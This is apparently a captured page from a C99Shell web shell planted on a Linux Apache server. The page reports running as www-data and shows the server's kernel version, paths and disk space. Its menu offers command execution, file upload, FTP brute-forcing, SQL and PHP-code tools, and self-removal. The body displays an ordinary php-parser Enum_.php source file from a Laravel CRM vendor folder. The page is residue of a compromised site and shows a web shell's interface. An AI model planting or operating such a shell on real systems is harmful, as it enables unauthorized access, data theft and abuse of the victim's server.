!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/nikic/php-parser/lib/PhpParser/Node/Stmt/   drwxrwxrwx
Free 12.97 GB of 57.97 GB (22.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Enum_.php (1.54 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);

namespace 
PhpParser\Node\Stmt;

use 
PhpParser\Node;

class 
Enum_ extends ClassLike {
    
/** @var null|Node\Identifier Scalar Type */
    
public ?Node $scalarType;
    
/** @var Node\Name[] Names of implemented interfaces */
    
public array $implements;

    
/**
     * @param string|Node\Identifier|null $name Name
     * @param array{
     *     scalarType?: Node\Identifier|null,
     *     implements?: Node\Name[],
     *     stmts?: Node\Stmt[],
     *     attrGroups?: Node\AttributeGroup[],
     * } $subNodes Array of the following optional subnodes:
     *             'scalarType'  => null    : Scalar type
     *             'implements'  => array() : Names of implemented interfaces
     *             'stmts'       => array() : Statements
     *             'attrGroups'  => array() : PHP attribute groups
     * @param array<string, mixed> $attributes Additional attributes
     */
    
public function __construct($name, array $subNodes = [], array $attributes = []) {
        
$this->name \is_string($name) ? new Node\Identifier($name) : $name;
        
$this->scalarType $subNodes['scalarType'] ?? null;
        
$this->implements $subNodes['implements'] ?? [];
        
$this->stmts $subNodes['stmts'] ?? [];
        
$this->attrGroups $subNodes['attrGroups'] ?? [];

        
parent::__construct($attributes);
    }

    public function 
getSubNodeNames(): array {
        return [
'attrGroups''name''scalarType''implements''stmts'];
    }

    public function 
getType(): string {
        return 
'Stmt_Enum';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0076 ]--